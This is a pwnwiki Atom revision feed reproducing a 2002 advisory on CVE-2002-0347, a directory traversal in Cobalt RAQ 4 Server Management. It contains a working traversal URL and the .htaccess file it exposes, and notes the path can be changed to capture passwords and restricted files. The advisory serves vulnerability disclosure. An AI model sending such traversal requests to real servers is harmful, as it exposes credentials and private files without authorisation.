<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0347_Cobalt_RAQ_4_Server_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2002-0347 Cobalt RAQ 4 Server 目錄遍歷漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0347_Cobalt_RAQ_4_Server_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0347_Cobalt_RAQ_4_Server_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T06:06:50Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2002-0347_Cobalt_RAQ_4_Server_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;diff=801&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal &amp; DoS Vulnerabilities. ------oOo----------------   Company...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0347_Cobalt_RAQ_4_Server_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;diff=801&amp;oldid=prev"/>
		<updated>2021-03-31T07:16:14Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal &amp;amp; DoS Vulnerabilities. ------oOo----------------   Company...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
------oOo----------------&lt;br /&gt;
Cobalt RAQ 4 Server Management,&lt;br /&gt;
Cross Site Scripting , Directory Traversal &amp;amp; DoS Vulnerabilities.&lt;br /&gt;
------oOo----------------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Company Affected: www.cobalt.com &amp;amp; www.sun.com&lt;br /&gt;
Version: RAQ 4 Server Management.&lt;br /&gt;
Dowload: http://www.cobalt.com/products/raq/index.html&lt;br /&gt;
OS Affected: Linux ALL, Solaris ALL.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Author:&lt;br /&gt;
&lt;br /&gt;
** Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt;&lt;br /&gt;
** Thanks all the people from Spain and Argentina.&lt;br /&gt;
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----=[Brief Description]=------------&lt;br /&gt;
&lt;br /&gt;
Traversal File configuration.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Exploit:&lt;br /&gt;
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess&lt;br /&gt;
&lt;br /&gt;
# Access file for /usr/admserv/html/.cobalt/admin/ (admin  )&lt;br /&gt;
order allow,deny&lt;br /&gt;
allow from all&lt;br /&gt;
require user admin&lt;br /&gt;
Authname CobaltRaQ&lt;br /&gt;
Authtype Basic&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Directory by Default on server is: &amp;quot;/usr/admserv/html/.cobalt/admin&amp;quot; u&lt;br /&gt;
can translate to any directory for capture restricted files or passwords &lt;br /&gt;
and profiles the users.&lt;br /&gt;
&lt;br /&gt;
Vendor Response:&lt;br /&gt;
The vendor was notified&lt;br /&gt;
&lt;br /&gt;
Posted List^s Security cobalt:&lt;br /&gt;
cobalt-security@list.cobalt.com &amp;amp;&lt;br /&gt;
jlovell@sun.com&lt;br /&gt;
&lt;br /&gt;
http://www.cobalt.com&lt;br /&gt;
&lt;br /&gt;
Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (c) 2002.&lt;br /&gt;
&lt;br /&gt;
------oOo------------------------------------&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>